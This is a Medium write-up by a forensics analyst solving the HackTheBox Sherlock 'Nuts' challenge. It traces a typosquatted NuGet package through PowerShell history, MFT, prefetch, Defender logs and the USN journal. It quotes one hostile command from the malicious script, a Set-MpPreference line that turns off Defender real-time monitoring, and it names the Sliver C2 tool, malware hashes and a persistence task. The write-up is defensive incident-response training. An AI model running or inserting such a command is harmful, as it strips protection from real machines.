Open in app

Sign in

Write

Sign in

HackTheBox Sherlock : Nuts

Write-Up

أحمد ناصر
7 min readNov 4, 2024

Hello Forensics Geeks, This is Ahmed Nasser known as (oxAlpha) and here is a simple write-up about Nuts Challenge from HTB .

لا تنسونا من الدعاء

MY LinkedIn

Q1-What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)

  • First thing came to my mind to check powershll logs and PSReadline to see “ConsoleHost_history”.
PSReadline Location:
Nuts\C\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Nuts\C\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
The Answer : nuget install PublishIgnor -Version 1.0.11-beta

Q2-Identify the URL from which the package was downloaded.

  • Since he asked about URL, first thing came to my mind is to check browser history :
Chrome history location:
Nuts\C\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
Nuts\C\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
  • then open History file using DB Browser and go to Browse Data > urls :
The Answer : https://www.nuget.org/packages/PublishIgnor/

Q3-Who is the threat actor responsible for publishing the malicious package? (the name of the package publisher)

  • Easy, Just open the Package URL from Q2 :
The Answer : a1l4m

Q4-When did the attacker initiate the download of the package? Provide the timestamp in UTC format (YYYY-MM-DD HH:MM).

  • Now Let’s Parse $MTF file Using a tool like MFTECmd.exe :
  • now open the csv file using a tool like TimelineExplorer :
The answer : 2024-03-19 18:41

Q5-Despite restrictions, the attacker successfully uploaded the malicious file to the official site by altering one key detail. What is the modified package ID of the malicious package?

  • From Q1,2 we saw that, the attacker managed to upload the malicious package “PublishIgnor” into Nuget site, by using typosquatting attack technique :
Real package name : PublishIgnore
modified package name : PublishIgnor
The answer : PublishIgnor

Q6-Which deceptive technique did the attacker employ during the initial access phase to manipulate user perception? (technique name)

  • From Q5 we known that, the attacker used typosquatting technique
The Answer :  typosquatting

Q7-Determine the full path of the file within the package containing the malicious code.

  • Again from the output of MTFECmd.exe tool :
  • now go to PowerShell script location and open it to see what’s go on :
C\Users\Administrator\.nuget\packages\publishignor\1.0.11-beta\tools
The Answer : C:\Users\Administrator\.nuget\packages\publishignor\1.0.11-beta\tools\init.ps1

Q8-When tampering with the system’s security settings, what command did the attacker employ?

  • From the malicious script above, we can see that the attacker tampering with the system’s security settings using this command :
Set-MpPreference -DisableRealtimeMonitoring $true
The Answer : Set-MpPreference -DisableRealtimeMonitoring $true

Q9-Following the security settings alteration, the attacker downloaded a malicious file to ensure continued access to the system. Provide the SHA1 hash of this file.

  • From Q7 we that attacker download a malicious file name “uninstall.exe” using the malicious PowerShell script.
  • Now time to see Windows Defender logs :
Windows Defender Logs :
C\Windows\System32\winevt\logs\Microsoft-Windows-Windows Defender%4Operational
  • Now Filter with Event ID 1116 & 1117 :
  • From above, we see that Windows Defender found the malicious file but the logs does not provide the file hash.
  • So after some search i found that , Windows Defender save scan results in text file name MPLog :
MPLog Location :
C\ProgramData\Microsoft\Windows Defender\Support
C\ProgramData\Microsoft\Windows Defender\Support
The Answer : 57b7acf278968eaa53920603c62afd8b305f98bb

Q10-dentify the framework utilised by the malicious file for command and control communication.

  • From Windows Defender Logs :
VirTool:Win32/Sliver.D!MTB
  • As you can see the malicious file is using Sliver Framework as C2
The Answer : Sliver

Q11-At what precise moment was the malicious file executed?

  • Now he is asking about the execution time of “Uninstall.exe” file
  • Firstly i started to parsing Amchache using a tool like AmcacheParser but found nothing .
Amcache Location :
C\Windows\AppCompat\Programs
  • So i started you parsing prefetch files using a tool like PECmd.exe :
The Answer : 2024-03-19 19:23:36

Q12-The attacker made a mistake and didn’t stop all the features of the security measures on the machine. When was the malicious file detected? Provide the timestamp in UTC.

  • Back Again to Windows Defender Log, we can see that the defender detected the malicious file “uninstaller.exe” :
The Answer : 2024-03-19 19:33:32

Q15-After establishing a connection with the C2 server, what was the first action taken by the attacker to enumerate the environment? Provide the name of the process.

  • Back again to Prefetch files, we know that the malicious file was executed “Uninstaller.exe” at <2024–03–19 19:23:36>
  • Therefore, we can narrow the time range :
The Answer : Whoami.exe

Q14-To ensure continued access to the compromised machine, the attacker created a scheduled task. What is the name of the created task?

  • Now Let’s check the schedule tasks in :
C\Windows\System32\Tasks
  • As shown, the attacker created a schedule task to tamper with the system’s security .
The Answer : MicrosoftSystemDailyUpdates

Q15-When was the scheduled task created? Provide the timestamp in UTC.

  • From image above we can see when the task was created :
The Answer : 2024-03-19 19:24:05

Q16-Upon concluding the intrusion, the attacker left behind a specific file on the compromised host. What is the name of this file?

  • Firstly i tried to find any thing useful in $MFT but found Nothing
  • So i tried to parse $Logfile using a tool like NTFS Log Tracker :
  • Then open the CSV file and filter with <2024–03–19 > “The time that malicious file was executed” :
The Answer : File.exe

Q17-As an anti-forensics measure. The threat actor changed the file name after executing it. What is the new file name?

  • Now Let’s parse $J file
C\$Extend\$J
  • Now search with file name “File.exe” :
The Answer : Updater.exe

Q18-Identify the malware family associated with the file mentioned in the previous question (17).

  • Firstly let’s calc file hash :
  • From $MTF , we know that “Updater.exe” is under ProgramData Folder :
MD5: E22B106252ECF59210262C67E1A8877B
The Answer : Impala

Q19-When was the file dropped onto the system? Provide the timestamp in UTC.

  • Back again to $MFT file :
The Answer : 2024-03-19 19:30:04

The End

Follow For more 😁

Htb
Digital Forensics
Cybersecurity
Ctf
Soc Analyst

--

--

أحمد ناصر
أحمد ناصر

Written by أحمد ناصر

84 Followers
24 Following

CyberSecurity Analyst || DFIR || CTF player

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams